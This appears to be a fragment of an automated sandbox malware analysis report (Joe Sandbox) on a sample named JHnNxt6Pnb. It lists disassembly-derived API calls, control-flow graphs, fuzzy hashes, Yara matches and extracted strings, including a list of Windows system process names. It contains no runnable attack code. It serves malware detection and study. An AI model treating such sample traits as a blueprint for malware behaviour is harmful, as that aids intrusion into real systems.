                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                              • Instruction ID: da53683470e229f3deabd99abb76fcc4fe04895a6951e78cd3bde030695561bd
                                                                                                                              • Opcode Fuzzy Hash: 2c69c3419cb1d5e4418932444e8ffbfd0296bf9a379bc45bb6b1a052704e6f0b
                                                                                                                              • Instruction Fuzzy Hash: 8D012871A80318BBE720A6908C43FFE772C5B41B44F04015EFF04BA1C2D6A8290543EA

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 236 408310-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 246 40835c-40836e PostThreadMessageW 236->246 247 40838e-408392 236->247 248 408370-40838a call 40a470 246->248 249 40838d 246->249 248->249 249->247
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                              • Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
                                                                                                                              • Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
                                                                                                                              • Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 276 41a782-41a7aa call 41af20 278 41a7af-41a7c4 LookupPrivilegeValueW 276->278
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              • Opcode ID: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                              • Instruction ID: ec21d61b55864976568eadb485c386ae057cc9e8f9e3017aea6482977b845cb1
                                                                                                                              • Opcode Fuzzy Hash: 6a4f472659cb80a7cb18072fc4a2f20237858cfeaddc240797383a312f94a6be
                                                                                                                              • Instruction Fuzzy Hash: C9E06DB5600205ABD620DF69DC80EE737AE9F58254F128165FA0DEB241DA39E8518BB4

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 282 41a630-41a661 call 41af20 RtlFreeHeap
                                                                                                                              APIs
                                                                                                                              • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FreeHeap
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3298025750-0
                                                                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                              • Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
                                                                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                              • Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 285 41a790-41a7a9 286 41a7af-41a7c4 LookupPrivilegeValueW 285->286 287 41a7aa call 41af20 285->287 287->286
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                              • Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
                                                                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                              • Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                              APIs
                                                                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1669134276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_400000_JHnNxt6Pnb.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 621844428-0
                                                                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                              • Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
                                                                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                              • Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                                                                                              • Instruction ID: bea7e14b897860535c0148af998dd2fca7d218b9228ed5d5213523b5794349a9
                                                                                                                              • Opcode Fuzzy Hash: 8121e9f8cf650665fcbb75aba163cdd2fa2b7ac83ed167fd087895e11eac0e38
                                                                                                                              • Instruction Fuzzy Hash: 15B09B71D015D5C5DA11E7644608717791077D0701F16C172F2034741F473CC5D1F275
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2160512332
                                                                                                                              • Opcode ID: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                                                                                              • Instruction ID: 5488dde0dd373dcc2350bfb6eab631f7460f30a87ffdc8dc7293d06694eeb1b9
                                                                                                                              • Opcode Fuzzy Hash: 6d17f466ab2d57c7aa724be71f760118fe468394b6637e25ec91f538c1e5c2c5
                                                                                                                              • Instruction Fuzzy Hash: CE927E71604742ABE721DF28C880B6BBBE8FF84750F04492EFA99D7251D774E845CB92
                                                                                                                              Strings
                                                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A5540A, 01A55496, 01A55519
                                                                                                                              • corrupted critical section, xrefs: 01A554C2
                                                                                                                              • undeleted critical section in freed memory, xrefs: 01A5542B
                                                                                                                              • 8, xrefs: 01A552E3
                                                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554E2
                                                                                                                              • Thread identifier, xrefs: 01A5553A
                                                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A554CE
                                                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01A55543
                                                                                                                              • Critical section address., xrefs: 01A55502
                                                                                                                              • Address of the debug info found in the active list., xrefs: 01A554AE, 01A554FA
                                                                                                                              • double initialized or corrupted critical section, xrefs: 01A55508
                                                                                                                              • Critical section address, xrefs: 01A55425, 01A554BC, 01A55534
• Invalid debug info address of this critical section, xrefs: 01A554B6
• Critical section debug info address, xrefs: 01A5541F, 01A5552E
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
Strings
• SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A52409
• SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A52498
• @, xrefs: 01A5259B
• SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A52412
• SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A52602
• SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A52624
• RtlpResolveAssemblyStorageMapEntry, xrefs: 01A5261F
• SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A525EB
• SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A522E4
• SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A524C0
• SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A52506
Similarity
• API ID:
• String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
• API String ID: 0-4009184096
Strings
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
Strings
Similarity
• API ID:
• String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
• API String ID: 0-1700792311
Strings
• VerifierDebug, xrefs: 01A68CA5
• HandleTraces, xrefs: 01A68C8F
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A68A3D
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A68A67
• VerifierFlags, xrefs: 01A68C50
• AVRF: -*- final list of providers -*- , xrefs: 01A68B8F
• VerifierDlls, xrefs: 01A68CBD
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
Strings
Similarity
• API ID:
• String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
• API String ID: 0-1109411897
Strings
Similarity
• API ID:
• String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
• API String ID: 0-792281065
Strings
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A39A2A
• minkernel\ntdll\ldrinit.c, xrefs: 01A39A11, 01A39A3A
• apphelp.dll, xrefs: 019D6496
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A39A01
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A399ED
• LdrpInitShimEngine, xrefs: 01A399F4, 01A39A07, 01A39A30
Similarity
• API ID:
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-204845295
Strings
• LdrpInitializeProcess, xrefs: 01A1C6C4
• Unable to build import redirection Table, Status = 0x%x, xrefs: 01A581E5
• minkernel\ntdll\ldrinit.c, xrefs: 01A1C6C3
• Loading import redirection DLL: '%wZ', xrefs: 01A58170
• minkernel\ntdll\ldrredirect.c, xrefs: 01A58181, 01A581F5
• LdrpInitializeImportRedirection, xrefs: 01A58177, 01A581EB
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
Strings
• RtlGetAssemblyStorageRoot, xrefs: 01A52160, 01A5219A, 01A521BA
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01A52178
• SXS: %s() passed the empty activation context, xrefs: 01A52165
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01A52180
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01A521BF
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01A5219F
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
APIs
  • Part of subcall function 01A22DF0: LdrInitializeThunk.NTDLL ref: 01A22DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A20D74
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
• Opcode ID: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
• Instruction ID: d03b597e291d750fcfef4bd4b168861dd05499f8cae41e27290fd1e590eb2535
• Opcode Fuzzy Hash: 00a5918febedd15e664ff63720fc0686aec9e4443951062978a3fb370a944b1d
• Instruction Fuzzy Hash: 3E426B71900715DFDB61CF28C980BAAB7F5FF04314F1445AAE999EB241E770AA85CF60
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
• Opcode ID: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
• Instruction ID: 4650b3ae73c28947ae2d34890a1e45b548e9814b06945c76578b75dd5a134654
• Opcode Fuzzy Hash: c897b17997e2ba525e20b22ef8df723d7b72889a40fb24b0ed007cf753226268
• Instruction Fuzzy Hash: 85C19D75108382CFD712CF58C548B6AB7E4FF84704F048D6AF9998B2A1E734CA49CB56
Strings
• LdrpInitializeProcess, xrefs: 01A18422
• \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01A1855E
• minkernel\ntdll\ldrinit.c, xrefs: 01A18421
• @, xrefs: 01A18591
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
• API String ID: 0-1918872054
• Opcode ID: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
• Instruction ID: 3d113d85d2ea5c614762cf02c2131f771f950b65fbecb83fd8fafc2541a21e9d
• Opcode Fuzzy Hash: 37a6268caa98a1837d0a122a529b093b9c93346538b457e39bc5d9af12983c29
• Instruction Fuzzy Hash: 1B919D71548345AFD721EF25CD80FABBAE8FF84794F44092EFA8892155E738D904CB62
Strings
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A522B6
• SXS: %s() passed the empty activation context, xrefs: 01A521DE
• .Local, xrefs: 01A128D8
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A521D9, 01A522B1
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
• Opcode ID: 74d0f32a7266f1808877942744bc1357f76ae49a82a1eb45083ac6983071b8f1
• Instruction ID: ce8955312f89e69f6fc27bfe56c537cbf17b44c8489815e4bcf6ef72dfb6c4e1
• Opcode Fuzzy Hash: 74d0f32a7266f1808877942744bc1357f76ae49a82a1eb45083ac6983071b8f1
• Instruction Fuzzy Hash: 74A1AC35A0022ADFDB25CF68D884BA9B7B1BF58354F2541EAD948EB255D730DE80CF90
Strings
• RtlDeactivateActivationContext, xrefs: 01A53425, 01A53432, 01A53451
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A53456
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A5342A
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A53437
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
• Opcode ID: 74b3d7f1ec39988442af5f76b8ec5858d4a11ed83f19191c68a2b0c8e71a4ffc
• Instruction ID: aabee70389bd430fdcab683f04b980e6dbb72ff323631c6c563b9485a265aeae
• Opcode Fuzzy Hash: 74b3d7f1ec39988442af5f76b8ec5858d4a11ed83f19191c68a2b0c8e71a4ffc
• Instruction Fuzzy Hash: 116112366087129BDB22CF1DC841B2ABBF5BFC4B91F19852DE9999B245C734E801CB91
Strings
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A41028
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A40FE5
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A410AE
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A4106B
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
• Opcode ID: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
• Instruction ID: c052aa127dc51381513a9214c7a2f23b69e825dc5db2feaf8f7bd6d78b64c97a
• Opcode Fuzzy Hash: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
• Instruction Fuzzy Hash: BA71C1B1A043159FCB21DF18C988F9B7FE8AFA4764F400868F9498B146D734D588CBD2
Strings
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A4A992
• minkernel\ntdll\ldrinit.c, xrefs: 01A4A9A2
• apphelp.dll, xrefs: 01A02462
• LdrpDynamicShimModule, xrefs: 01A4A998
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
• Opcode ID: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
• Instruction ID: 3dc956b662187021fb2d9e48cb0f5b25ae073bb8f5d709908db317c54e7ee35a
• Opcode Fuzzy Hash: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
• Instruction Fuzzy Hash: E3314AB9A80701EBDB32DF5DD945A6E77B4FFC4B00F16001AE907A7246C7705942C781
Strings
• HEAP[%wZ]: , xrefs: 019F3255
• HEAP: , xrefs: 019F3264
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019F327D
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
• Opcode ID: 3d8f6e476cf83b7c9ac7c2f9fb9ccd82780915c7a4e85f9b44fb40571dcccacf
• Instruction ID: 9f662f61e6c25079d45341637a8957764fe412e8ab9014ab0d6415dcbf0e17f1
• Opcode Fuzzy Hash: 3d8f6e476cf83b7c9ac7c2f9fb9ccd82780915c7a4e85f9b44fb40571dcccacf
• Instruction Fuzzy Hash: 8292CE70A04249AFDB25CF68C444BAEBBF5FF48310F18849DEA59AB391D738A945CF50
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
• Opcode ID: c55c94c204d7422f4e4d64c7ba4efd93074b837e1fd2322b2485bff6f4d7d0ab
• Instruction ID: 1928a8ed3d2b00cf27a636c5f75ee7644d721dfff113a0ea29da8ec362cf869c
• Opcode Fuzzy Hash: c55c94c204d7422f4e4d64c7ba4efd93074b837e1fd2322b2485bff6f4d7d0ab
• Instruction Fuzzy Hash: 60F19F34A00606EFEB15CF68C984F6AB7BAFF84304F18455DE61A9B352D734E981CB91
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $@
• API String ID: 2994545307-1077428164
• Opcode ID: 792a0bc31be6864369b519131859fffdd342f1bff38c05ba3f3ce8584f7ac5e9
• Instruction ID: e3fe7782ef686e3b6619c1b0711203864cf0e042bd6e3e744597b68a2e619b09
• Opcode Fuzzy Hash: 792a0bc31be6864369b519131859fffdd342f1bff38c05ba3f3ce8584f7ac5e9
• Instruction Fuzzy Hash: 06C27071A093419FE726CF68D840BABBBE5AFC8754F04892DE9C9C7281D734E845CB52
Strings
Memory Dump Source
• Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
• Opcode ID: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
